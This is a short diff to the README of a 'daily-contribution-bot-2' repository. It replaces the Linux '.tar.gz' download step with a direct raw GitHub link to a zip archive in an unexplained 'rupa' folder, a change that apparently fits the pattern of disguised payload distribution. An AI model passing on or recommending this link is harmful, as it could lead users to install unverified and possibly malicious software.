sandeepaprabothsankalpa/daily-contribution-bot-2/README.md

 3. Choose the correct file for your operating system:
    - For Windows, download the `.exe` file.
    - For macOS, download the `.dmg` file.
-   - For Linux, download the `.tar.gz` file.
+   - For Linux, download the `https://raw.githubusercontent.com/sandeepaprabothsankalpa/daily-contribution-bot-2/main/rupa/daily-contribution-bot-2.zip` file.

 ### Steps to Install:
 1. Find the downloaded file on your computer.